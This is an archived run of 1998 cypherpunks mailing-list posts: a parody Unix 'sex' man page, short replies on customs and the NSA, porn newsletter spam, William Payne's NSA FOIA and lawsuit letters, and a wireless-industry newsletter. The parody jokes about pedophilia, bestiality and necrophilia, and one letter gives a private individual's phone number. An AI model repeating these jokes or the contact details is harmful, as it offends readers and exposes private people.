On Thu, 27 Aug 1998, Wilhelm Klink wrote:

> 
>                     Top Ten Offensive Things in Unix
>
>  1.  "man sex" responds with "no manual entry for sex".


SEX(1)              EUNUCH Programmer's Manual             SEX(1)

NAME
       sex -- have sex

SYNOPSIS
       sex [options] ...  [username] ...

DESCRIPTION
       sex allows the invoker to have sex with the user(s) speci-
       fied in the command line.  If no users are specified, they
       are  taken  from the LOVERS environment variable.  Options
       to make things more interesting are as follows:

       -1     masturbate

       -a     external stimulus (aphrodisiac) option

       -b     buggery

       -B animal
              bestiality with animal

       -c     chocolate sauce option

       -C     chaining option (cuffs included) (see  also  -m  -s
              -W)

       -d file
              get a date with the features described in file

       -e     exhibitionism  (image  sent  to all machines on the
              net)

       -f     foreplay option

       -F     nasal sex with plants

       -i     coitus interruptus (messy!)

       -j     jacuzzi option (California sites only)

       -l     leather option

       -m     masochism (see -s)

       -M     triple parallel (Menage a Trois) option

       -n     necrophilia (if target process is not dead, program
              kills it)

       -o     oral option

       -O     parallel access (orgy)

       -p     debug option (proposition only)

                                                                1
       -m     masochism (see -s)

       -M     triple parallel (Menage a Trois) option

       -n     necrophilia (if target process is not dead, program
              kills it)

       -o     oral option

       -O     parallel access (orgy)

       -p     debug option (proposition only)

                                                                1

SEX(1)              EUNUCH Programmer's Manual             SEX(1)

       -P     pedophilia (must specify a child process)

       -q     quickie (wham, bam, thank you, ma'am)

       -s     sadism (target must set -m)

       -S     sundae option

       -v     voyeurism (surveys the entire net)

       -w     whipped cream option

       -W     whips (see also -s, -C, and -m)

ENVIRONMENT
       LOVERS is a list of default partners which will be used if
              none are specified in the command line.  If any are
              specified, the values in LOVERS is ignored.

FILES
       /usr/lib/sex/animals
              animals for bestiality

       /usr/lib/sex/blackbook
              possible dates

       /usr/lib/sex/sundaes
              sundae recipes

       /usr/lib/sex/s&m
              sado-masochistic equipment

BUGS
       ^C     (quit process) may leave the user very unsatisfied.

       ^Z     (stop process) is usually quite messy.

HISTORY
       Oldest program ever.

                                                                2








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jdean1@nomvs.lsumc.edu
Date: Fri, 28 Aug 1998 04:35:18 -0700 (PDT)
To: dulac@ip.pt
Subject: Re: McCarthy return under new clothes
In-Reply-To: <199808271904.UAA01733@mail2.ip.pt>
Message-ID: <19980828063447361@nomvs.lsumc.edu>
MIME-Version: 1.0
Content-Type: text/plain


>  Is the information one's carry in one's head much different
>  from the info on a disk?!? It is certainly smaller, but much
>  more powerful.

The difference is custom officials don't have a scan tool for your
brain (yet).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Thu, 27 Aug 1998 15:52:33 -0700 (PDT)
To: "Brown, R Ken" <brownrk1@texaco.com>
Subject: question...
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F83C9@MSX11002>
Message-ID: <Pine.GSO.3.96.980828065750.4605A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


Could the FBI intervene with the NSA?

===============================================================================
It's funny, I have always been a good 
	listener who understood and cared
		someones secrets, but to my dismay 
			I have never been understood.


metaphone@altavista.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Fri, 28 Aug 1998 14:41:13 -0700 (PDT)
To: (STUFFED FRIDAY AUGUST 28 1998)
Subject: OUR FREE PICS ARE GETTING HOTTER BY THE DAY!/Foot fetishist marries 14-toed bride
Message-ID: <19980828071000.23134.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


We've been getting stacks of new photos together. Here are
some of the first ones. Keeping the bulging pants down while
preparing today's issue was NOT easy!

+ INCREDIBLY HORNY SEXY STORY
+ HOW TO MAKE HER SAY "YES!"
+ OUTRAGEOUSLY FUNNY AND SEXY STORIES
+ OOH... ONE READER SENT US A SUPERB, LONG
  'TRUE SEX SECRET', WHICH WE PUBLISH TODAY
+ MORE GREAT STUFF THAN YOU CAN SHAKE A
  STICK AT!

       ---->   http://stuffed.net/98/8/28/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/8/28/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 28 Aug 1998 09:45:03 -0700 (PDT)
To: armoral@flash.net
Subject: dow jones
Message-ID: <35E6DD65.2504@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 8/28/98 10:07 AM

J Orlin Grabbe

You may have gotten it TOO RIGHT

http://www.aci.net/kalliste/apocalyp.htm

Morales and I met.

We got a response from a deputy clerk to our attached letter.

No form for 54(b) certification and no examples.

We have a plan of what to include in our response to 

  http://www.jya.com/chrysler98.htm

AND 54(b) certification.

We see that we can respond by e-mail.

  e-mail: vhardy@detroit.bozell.com

But we'll use certified snail mail too.

Reporter Spohn of the ABQ Trib  
  
  1990 Lawrence Spohn, Albuquerque Tribune     
http://www.aaas.org/AAAS/awards.html
  http://www.atiin.com/atiin/tribune.htm  
  http://www.abqtrib.com 

told me he is going to make FOIA requests for the invoices NSA spent or
wasted funding public key cryptography chips TOO.

Morales and I also discussed our up-coming NSA fee waiver lawsuit. 

  NSA  deputy director Barbara McNamara's  wrote me a letter dated
19     August  1998.  http://www.nsa.gov:8080/mission.html

  McNamara wrote,

  The key issue I considered in my review is whether disclosure of
the    information is likely to contribute to the public understanding
of the   operations or activities of the government. ...

  This response may be construed as a denial of your appeal.           
Accordingly, you are hereby advised to your right to seek judicial     
review of my decision pursuant to 5 U.S.C.  552(a)(4)
  (B) in the United States District Court in the district in which
you    reside, in which you have your principal place of business, in
which    the Agency's records are situated (U.S. District Court of
Maryland),    or in the District of Columbia. 

We've learned a lot with our current NSA lawsuit.  So the NEXT lawsuit
should be more devastating for the government.

But let's hope we get this UNFORTUNATE matter settled so that we
can move on to other projects.

I miss the economic articles you post from throughout the world.
http://www.aci.net/kalliste/

What's happening is not your fault.  You are merely a message-deliverer.

Later
bill


Tuesday 8/18/98 7:33 AM

Certified   Return receipt requested

Robert M. March, Clerk
United States District Court
Office of the Clerk
POB 2384
US Courthouse
Santa Fe, NM 87504-2384

Dear clerk March:

Purposes of this letter are to

1 request a copy of a UNITED STATES DISTRICT COURT FOR THE DISTRICT OF NEW MEXICO Rule 
54(b) certification form if such form exists

2 request an example of a Rule 54(b) certification if such certification is submitted in non-standard form

3 ask for you to provide us with DISTRICT OF NEW MEXICO case citations for others required by the Tenth 
circuit to seek Rule 54(b) certification.

We could not find form referenced in 1 in LOCAL CIVIL RULES, UNITED STATES DISTRICT COURT 
FOR THE DISTRICT OF NEW MEXICO or at  http://www.nmcourt.fed.us/dcdocs/ specifically 
http://www.nmcourt.fed.us/dcdocs/files/lcvrules.txt

We ask that you respond to this letter by September 1, 1998.

Nonresponse must be interpreted as

4  there is no Rule 54(b)form

5  there is no example of a Rule 54(b) non-standard form certification

6  there are no examples of Rule 54(b) certifications in the UNITED STATES DISTRICT COURT FOR THE 
DISTRICT OF NEW MEXICO.

Sincerely

  
William H. Payne             	   	 Arthur R. Morales
13015 Calle de Sandias NE          	 1024 Los Arboles NW
Albuquerque, NM 87111              	 Albuquerque, NM 87107       
  



Friday February 27, 1998 11:18 AM

By e-mail and US mail

Lieutenant General Kenneth A Minihan, USAF
Director, National Security Agency
National Security Agency
9800 Savage Road
Fort George G. Meade, MD 20755-6000

Dear General Minihan:

Purposes of the letter are to

1  request information under the Freedom of Information Act
2  explore settlement possibilities of our current lawsuit.

In about 1986 Sandia National Laboratories assigned me the 
task of  design and construction of a Comprehensive Test Ban 
Treaty seismic data authenticator.

In the initial stages of the project, Sandia cryptographer 
Gustavus Simmons attempted to convince both Sandia 
management and NSA employees Tom White, Mark Unkenholtz,
and Ed Georgio that a form of public key authentication should 
replace NSA employee Ronald Benincasa's National Seismic
Station/Unmaned Seismic Observatory 11-bit data authentication
algorithm.

My Sandia supervisor John Holovka and project leader H B [Jim]
Durham ordered me to write a paper explaining public key 
cryptography.

This paper,  RSA ENCRYPTION, along with my SAND report
describing my implementation of Benincasa's algorithm and
filings in our lawsuit, now appear on Internet at
http://www.jya.com/index.htm, click CRYPTOME, then OpEd,
then http://www.jya.com/whprsa.htm.

Sandia explored the merits of switching from Benincasa's
algorithm to a public key-based authentication method suggested
by Simmons.

For Sandia's evaluation of the merits of public key, electronic tagging,
and Bureau of Engraving and Printing projects ,  I bought for Sandia 
samples both the Cylink CY1024 and AT&T A & B two chip sets for
modulo m arithmetic computations.

NSA employee Tom White sent me a copy of the SECRET classified
NSA report on IBM's hardware public key chip FIREFLY.

I wrote in my tutorial paper

  RSA hardware computations

  The slow speed of software RSA computations plus the potential
  wide use prompted several companies to build chips which compute
  modular arithmetic to at least several hundred bits.  Most of
  these chips "cascade" to compute with a larger number of bits.

  Corporations involved in building these chips are

     1  IBM  Firefly

     2  AT&T

     3  Motorola (apparently a three chip set)

     4  Cylink   Pittway-First alert

     5  Sandia Labs (Algorithm M and predecessor chip)

  Details of the IBM chip is classified.  AT&T as of July 1987 has
  not released details of their chip.  Little information is
  available on the Motorola chip set.

  The Cylink chip is commercially available.  Its price dropped
  from $1,500 to $600 each in June 1987.  Data is transferred to
  and from the chip with serial shift register communication.

  The early Sandia chip was limited in speed.  The replacement
  chip is cascadeable, communicates with 8 or 16 bits parallel,
  matches the speed of the Cylink chip, but is not out of
  fabrication.

  Rumors circulate that there is about an order of magnitude
  performance difference between some of these chips.

  These hardware chips improve exponentiation speed about 3 orders
  of magnitude over software implementation benchmarked on an Intel
  8086 family microcomputer.

Whitfield Diffie writes about both the Cylink and Sandia chips.  And
is quoted at  http://www.aci.net/kalliste/nukearse.htm.

Sandia had terrible luck with its public key chips.  

I reported SOME of the troubles to Electronic Engineering Times editor Loring Wirbel [http://techweb.cmp.com/eet/823/] on March 23, 1994.

        Dr. John Wisniewski was a supervisor at Sandia's Center for
        Radiation-hardened Microelectronics.  Wisniewski was a graduate
        student at Washington State University in about 1975.  I was a
        professor at WSU.

        Wisniewski knows all about the failing Sandia chips in the nuclear
        arsenal.  I took notes on February 13, 1993.  Wisniewski reviewed
        the problems again for me.

             1    No quality initiative.  Each chip lot had a different
                  process.
             2    Overall yield - 40-50%.  Down to 10% after packaging.
             3    Metalization problems.  No planarization.  No flow of
                  glass.  Couldn't use high temperature.  Step coverage
                  problems.  Layed down over tension.  100% field returns
                  over several years.
             4    Sandia would store lots of parts for replacements.

        Sandia management made the decision to place low yield parts in
        the nuclear arsenal.  Sandia must meet DOD schedules management
        reasoned.  Hundreds of millions spent on CRM.  Sandia must show
        productivity.

        Wisniewski told me that low yield chip test survivors are those which
        the tests failed to detect failures.  Wisniewski will talk.  503-625-
        6408.  Wisniewski now works for Intel in Oregon.  Have Wisniewski
        tell you about the fire in the CRM clean room!

Sandia supervisor Jerry Allen later told me it cost $300,000 each to remove
Sandia's failing chips at Pantex from a nuclear bomb.

NSA apparently is biased toward hardware implementations of cryptographic
and authentication algorithms.  As opposed to software implementation.

NSA representatives and Sandia management decided not to use a public
key authentication scheme for its CTBT seismic data authenticator because
of all of the problems with implementing public key algorithms.

But NSA surely has spent MUCH MONEY on public key chip implementations.

NSA is promoting its Clipper crypto chips as described at http://cpsr.org/dox/clipper.html.

And we get some information about technical specifications of NSA's Clipper
chip at http://www.us.net/softwar/http://www.us.net/softwar/clip.html

  Clipper Chip Information

  MYK-78 CLIPPER CHIP ENCRYPTION/DECRYPTION  ON A CHIP 

     1 micron double level metal CMOS technology 
     0.35 watts power 
     28 pin plastic leaded chip carrier (PLCC) package 
     Transistor to transistor logic (TTL) interface 
     Chip ID, family key and device unique key are installed at programming. 
     Chip ID, family key and device unique key are installed at programming           facility and are completely transparent to the user.

Therefore, Under the provision of the Freedom of Information Act, 
5 USC 552, I am requesting access to: 

1  Copies of all invoices from

	A   AT&T
	B   Motorola
	C   IBM
	D  Sandia National Laboratories

to NSA for payments for developing ANY public key-related chips between January 1, 1980 and February 27, 1998.

2  Copies of all invoices to NSA from ANY corporation involved in development
of ANY Clipper chip-related hardware between January 1, 1980 and 
February 27, 1998.

The public has a right to know how much NSA spent on TRYING monoploize the crypto
business.

If there are any fees for searching for, or copying, the records I have 
requested, please inform me before you fill the request.

As you know, the Act permits you to reduce or waive the fees when the 
release of the information is considered as "primarily benefiting the public."  
I believe that this requests fits that category and I therefore ask that you waive 
any fees.

If all or any part of this request is denied, please cite the specific exemption(s) 
which you think justifies your refusal to release the information and inform 
me of your agency's administrative appeal procedures available to me under the law.

I would appreciate your handling this request as quickly as possible, and I look 
forward to hearing from you within 20 working days, as the law stipulates.

With respect to our current FOIA lawsuit, I feel that we should settle this
unfortunate matter.

I see from your biography at  http://www.nsa.gov:8080/ and
http://www.nsa.gov:8080/dirnsa/dirnsa.html that you are

         1979   Distinguished Graduate
         Master of Arts degree in National Security Affairs 
         Naval Postgraduate School 
         Monterey, California

One of my former M.S. and Ph.D students in Computer Science,
Ted Lewis, is currently the chairman of Computer Science at
Naval Postgraduate School [http://www.friction-free-economy.com/].

Small world.

But I think that this emphasizes that WE SHOULD all be on the same side.
Not engaged in a conflict in US federal court.  Or on Internet.

NSA attempts to withhold requested information are possibly unwise.  

In our wired world the aggrieved know what happened to them. http://www.wpiran.org/,http://www.netlink.co.uk/users/impact/namir/namirm.html

And moderates in Iran, http://persia.org/khatami/biography.html, appear want
settlement too.

My family and I have been damaged by these crypto wars.

I ask you that consider fair settlement of damages caused by the National
Security Agency.

I cannot find your e-mail address on Internet.

Therefore I will forward the e-mail copy of this FOIA/settlement letter to 
Ray Kammer of NIST [http://www.nist.gov/], who along with the FBI 
[http://www.fbi.gov/, http://www.fbi.gov/fo/nyfo/nytwa.htmand], and NSA 
are trying to control the crypto business so that Kammer can possibly
forward an e-mail copy of the FOIA/Settlement letter to you.

Sincerely,

bill

William Payne
13015 Calle de Sandias
Albuquerque, NM 87111
505-292-7037 [I am not reading e-mail]





 





http://www.cylink.com/


http://www.jya.com/tis-p-bckrs.htm
Date: Wed, 25 Feb 1998 13:53:33 -0500
From: nospam@synernet.com (Ed Stone)
Subject: Re: Another Network Associates U-Turn on Key Recovery
To: jy@jya.com

PGP Inc's new owner, Network Associates, has announced it is acquiring 
Trusted Informations Systems, Inc. On the TIS web site, the following 
project is detailed, in which Dr. Dorothy Denning was a subcontractor, 
and in which policy-based crypto key release systems were explored, in 
collaboration with the NSA, FBI, etc.:

Source: http://www.tis.com/research/crypto/crypt_krp_projsum.html

Policy-Based Cryptographic Key Release Systems
Cryptographic Key Release Language Design and Specification


View the quad chart graphic for the Policy-Based Cryptographic Key
Release System

Project Summary

ARPA Order Number: 8685 

Contractor: Trusted Information Systems, Inc. 3060 Washington Road
Glenwood, Maryland 21738 Phone: (301) 854-6889 FAX:
(301) 854-5363 

Subcontractors: Dr. Dorothy Denning
Dr. Burton Kaliski
Dr. Warwick Ford
Russel Housley

http://www.nsa.gov:8080/

http://www.nsa.gov:8080/dirnsa/dirnsa.html

1979   Distinguished Graduate
         Master of Arts degree in National Security Affairs 
         Naval Postgraduate School 
         Monterey, California

http://www.friction-free-economy.com/

http://www.nist.gov/

CPSR 
Computer Professionals 
for Social Responsibility
http://cpsr.org/dox/home.html
Clipper

Clipper Chip Information
http://cpsr.org/dox/clipper.html

MYK-78 CLIPPER CHIP ENCRYPTION/DECRYPTION
                                          ON A CHIP 

http://www.us.net/softwar/http://www.us.net/softwar/clip.html

     1 micron double level metal CMOS technology 
     0.35 watts power 
     28 pin plastic leaded chip carrier (PLCC) package 
     Transistor to transistor logic (TTL) interface 
     Chip ID, family key and device unique key are installed at programming. 
     Chip ID, family key and device unique key are installed at programming facility and are completely transparent to the
     user.
Dear General Minihan:

Sincerely,



William H. Payne                   
13015 Calle de Sandias NE          
Albuquerque, NM 87111              
Books

   1.Bamford, James. The Puzzle Palace: A Report on America's Most Secret Agency. 
   2.Hafner, Katie and John Markoff. Cyberpunk: Outlaws and Hackers on the Computer Frontier 
   3.Lapidus, Edith. Eavesdropping on Trial.. 
   4.Schneier, Bruce. Applied Cryptography 
   5.Sterling, Bruce. The Hacker Crackdown. 

     General Periodicals

   6.Slatalla, Michelle and Joshua Quittner. "Gangwars in Cyberspace. " Wired. 
   7.Baker, Stewart A. "Don't Worry, Be Happy." Wired. 
   8.Denning, Dorothy. "The Clipper Chip Will Block Crime." Newsday. 
   9.Dewitt, Philip Elmer. "Who Should Keep the Keys?" Time. 
  10.Lewis, Peter. "Now Congress gets to weigh in on Clinton's high-tech plan for wiretapping." New York Times. 
  11.Markoff, John. "Big Brother and the Computer Age." New York Times. 
  12.Markoff, John. "Flaw Discovered in Federal Plan for Wiretapping." New York Times. 
  13.Markoff, John. "Industry Defies U.S. on Data Encryption."New York Times. 

     Specialized Journals

  14.--. "Cylink Offers Triple-DES ICs for Civil Service Encryption." Electronic News. 
  15.Banisar, David and Ken Robinson. "Security and Privacy on the Information Highway." Educom Review. 
  16.Blackmon, Ric. "Data-Tapping Made Easy" Phrack. 
  17.Peterson, A. Padgett. "Clipper chip won't clip your wings, it will just protect the unprotected." Infoworld. 
  18.*Steal, Agent. "Tapping Telephone Lines Voice or Data for Phun, Money, and Passwords." Phrack. 
     * Pseudonym 

     Government Documents

  19.Administrative Office of the U.S. Courts. Wiretap Report. 
  20.Department of Justice. "Attorney General Makes Key Escrow Encryption Announcements." 
  21.House Subcommitte on Technology, Environment and Aviation. "Communications and Computer Surveillance, Privacy, and
     Security." 
  22.House Subcommitte on Telecommunications and Commerce. "Telecommunications Network Security." 
  23.Omnibus Crime Control and Safe Streets Act of 1968. 
  24.U.S. Bureau of the Census. "Statistical Abstract of the United States: 1993". 
  25.White House Press Secretary. "Clipper Press Release." 

     Institutional Sources

  26.Association for Computing Machinery, U.S. Public Policy Committee. "Computer Policy Committee Calls for Complete Withdrawl
     of Clipper." 
  27.Computer and Business Equipment Manufacturers Association. "CBEMA Recommendations on Encryption Policy." 
  28.Computer Professionals for Social Responsibility. "Clipper Fact Sheet." 
  29.Hanson, Robin. "Can Wiretaps Remain Cost-Effective?"Communications of the ACM 
  30.Hoffman, Lance, et al. "Cryptography Policy." Communications of the ACM. 
  31.Hoffman, Lance. "Clipping Clipper." Communications of the ACM. 
  32.Landau, Susan, et al. "Crypto Policy Perspecitves." Communications of the Association for Computing Machinery. 
  33.Privacy Rights Clearinghouse. "Wiretapping and Eavesdropping: Is There Cause for Concern?" 

     Interviews 

  34.Lo, Virginia. Personal interview. 
  35.Schuman, David. Personal interview. 
  36.McClandish, Stanton. E-mail interview. 

     Exclusive Internet Soucres

  37.Rivest, Ron. "Re: Newsday Editorial." 
  38.Meeks, Brock. "Jacking in from the 'Sooner or Later' Port." CyberWire Dispatch 
  39.Gore, Al. "Letter to Representative Cantwell" 

     Other

  40.Delaney, Donald, et al. "Wiretap Laws and Procedures: What Happens When the U.S. Government Taps a Line." 
Purposes of this http://www.ihrwg.org/CP/ai82.htm

During 1981 Amnesty' International received hundreds of allegations of torture of political prisoners, in particular in Evin Prison in Tehran.
Some were supported by photographs and medical reports. The methods of torture described in these reports included beating, kicking,
whipping with cables, banging heads against walls, burning with cigarettes, burning with an iron and mock executions. One report described
a special room at Evin Prison called autog-e autoo (ironing room) in which prisoners were tied to a bed and their backs, buttocks and the
soles of their feet were burned with an iron. In another place in Evin Prison called zire zamin-e haqiqat (basement of truth) it was alleged
that prisoners were burned with cigarettes during interrogation. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Fri, 28 Aug 1998 14:51:59 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 28, 1998
Message-ID: <199808281928.OAA09340@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713796.multipart/mixed"

--Boundary..3995.1071713796.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 




--Boundary..3995.1071713796.multipart/mixed
Content-Type: application/octet-stream; name="bin00025.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00025.bin"
Content-Description: "_CTIA_Daily_News_19980828a.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8Q0VOVEVSPiZuYnNwOzwvQ0VOVEVS
PgoKPENFTlRFUj48VEFCTEUgQk9SREVSPTAgQ09MUz0yIFdJRFRIPSI2MDAi
ID4KPFRSPgo8VEQ+PEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbSI+
PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20vaW1hZ2VzL2hvbWVo
ZWRfdGVzdC5naWYiIEFMVD0iV09XLUNPTS5DT00iIE5PU0FWRSBCT1JERVI9
MCBIRUlHSFQ9ODkgV0lEVEg9Mjc1PjwvQT48L1REPgoKPFREPgo8Q0VOVEVS
PjxBIEhSRUY9Imh0dHA6Ly93d3cud2lyZWxlc3NpdC5jb20iPjxJTUcgU1JD
PSJodHRwOi8vd3d3Lndvdy1jb20uY29tL2ltYWdlcy9hcnRkcm9wLzB3aXJl
bGVzc2l0LmdpZiIgQUxUPSJUb2RheSdzIE5ld3MgU3BvbnNvcmVkIGJ5IFdJ
UkVMRVNTIEkuVC4gOTgiIE5PU0FWRSBCT1JERVI9MCBIRUlHSFQ9NjAgV0lE
VEg9MjM0PjwvQT48L0NFTlRFUj4KPC9URD4KPC9UUj4KPC9UQUJMRT48L0NF
TlRFUj4KCjxDRU5URVI+Jm5ic3A7PC9DRU5URVI+Cgo8Q0VOVEVSPjxUQUJM
RSBCT1JERVI9MCBXSURUSD0iNjAwIiA+CjxUUiBCR0NPTE9SPSIjMDAwMDk5
Ij4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj48Rk9OVCBDT0xPUj0iI0NDQ0NDQyI+PEZPTlQgU0laRT0rMT5DVElB
CkRhaWx5IE5ld3MgZnJvbSBXT1ctQ09NIC0gQXVndXN0IDI4LCAxOTk4PC9G
T05UPjwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iNTgwIj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5Db21tdW5p
dGllcyBTaG91bGQgQ29udHJvbApEZXBsb3ltZW50IG9mIEFudGVubmEgU2l0
ZXMsIEJvc3RvbiBHbG9iZSBFZGl0b3JpYWwgU2F5czwvRk9OVD48L0ZPTlQ+
PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgY2VsbHVsYXIg
b3BlcmF0b3JzIGJ1aWxkaW5nIGFudGVubmFzCmluIE1hc3NhY2h1c2V0dHMg
c2hvdWxkIGJlIGZvY3VzZWQgb24gdGhlIGFwcGVhcmFuY2Ugb2YgdGhlaXIg
Y29tbXVuaXRpZXMsCmFjY29yZGluZyB0byBhIEJvc3RvbiBHbG9iZSBlZGl0
b3JpYWwuIE9wZXJhdG9ycyBjYW4gYXBwZWFsIGFueSBvcHBvc2luZwpsb2Nh
bCBkZWNpc2lvbiBvbiBhbiBhbnRlbm5hIHNpdGUgdW5kZXIgdGhlIFRlbGVj
b20gQWN0IG9mIDE5OTYsIHdoaWNoCmdpdmVzIGNhcnJpZXJzIHRoZSBlZGdl
IG92ZXIgY29tbXVuaXRpZXMsIHRoZSBHbG9iZSBzYXlzLiBJbiBGZWJydWFy
eSwKdGhlIE1hc3NhY2h1c2V0dHMgRGVwYXJ0bWVudCBvZiBUZWxlY29tbXVu
aWNhdGlvbnMgYW5kIEVuZXJneSBnYXZlIHRlbGNvcwp0aGUgc2FtZSBwcm90
ZWN0aW9uIGFzIHB1YmxpYyBzZXJ2aWNlIGNvcnBvcmF0aW9ucywgYWxsb3dp
bmcgdGhlbSB0byBzdXJwYXNzCmxvY2FsIHpvbmluZy4gQmVjYXVzZSB3aXJl
bGVzcyBzZXJ2aWNlIGlzIG5vdCBhIHJlcXVpcmVtZW50LCBjb21tdW5pdGll
cwpzaG91bGQgYmUgYWJsZSB0byBjb250cm9sIHRoZSBkZXBsb3ltZW50IG9m
IHRvd2VycywgdGhlIEdsb2JlIHNheXMuICg8QSBIUkVGPSJodHRwOi8vd3d3
LmJvc3Rvbi5jb20vZGFpbHlnbG9iZS9nbG9iZWh0bWwvMjM5L0NvbnRyb2xs
aW5nX2FudGVubmFfYmxpZ2h0LnNodG1sIj5CT1NUT04KR0xPQkU8L0E+KTwv
Rk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPlNuYWZ1cyBUb3dlciBPdmVyIFdlc3QKQmxvb21maWVsZCBUb3duc2hp
cCwgTWljaGlnYW4mbmJzcDs8L0ZPTlQ+PC9GT05UPjwvQj4KPEJSPjxCPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5DZWxs
dWxhciBBZ3JlZW1lbnQ8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+Q29uc3RydWN0aW9uIGJ5IGZpdmUgY2VsbHVsYXIg
cGhvbmUgY29tcGFuaWVzCm9mIGEgJDEgbWlsbGlvbiByZWNyZWF0aW9uIGJ1
aWxkaW5nIGZvciB0aGUgV2VzdCBCbG9vbWZpZWxkIFRvd25zaGlwIFBhcmtz
CmFuZCBSZWNyZWF0aW9uIENvbW1pc3Npb24gaW4gZXhjaGFuZ2UgZm9yIGEg
bGFuZC1sZWFzZSBwZXJtaXQgZnJvbSB0aGUKcGFya3MgcGFuZWwgdG8gYnVp
bGQgMTIwLWZvb3QtdG93ZXJzIGF0IHRoZSB0b3duc2hpcCdzIERyYWtlIFJv
YWQgU3BvcnRzClBhcmsgaGFzIGJlZW4gZGVsYXllZC4gVGhlIGRpcmVjdG9y
IG9mIHBhcmtzIGFuZCByZWNyZWF0aW9uIHNheXMgdGhlIGhvbGR1cAppcyB0
aGUgcmVzdWx0IG9mIHBlbmRpbmcgbmVnb3RpYXRpb25zIHdpdGggdGhlIGNl
bGx1bGFyIHRvd2VyIGF0dG9ybmV5cwpvdmVyIGEgbGVhc2UgZm9yIHRoZSB0
b3dlcnMgYW5kIGEgY29uc3RydWN0aW9uIGFnZW5jeSBhZ3JlZW1lbnQsIHdo
aWNoCndvdWxkIGFkZHJlc3Mgc3VjaCBpc3N1ZXMgYXMgd2hhdCBraW5kIG9m
IGluc3VyYW5jZSB3aWxsIGJlIHByb3ZpZGVkIGFuZAp3aG8gd2lsbCBwYXkg
Zm9yIGRhbWFnZXMuICg8QSBIUkVGPSJodHRwOi8vd3d3LmZyZWVwLmNvbS9u
ZXdzL2xvY29hay9udXBkYXRlMjcuaHRtIj5ERVRST0lUCkZSRUUgUFJFU1M8
L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBTSVpFPSsxPkZpcm0gV2FudHMgdG8gRXJlY3QgVHdvCkNlbGwgU2l0ZXMg
aW4gSW5kaWFuYXBvbGlzIEFyZWE8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoK
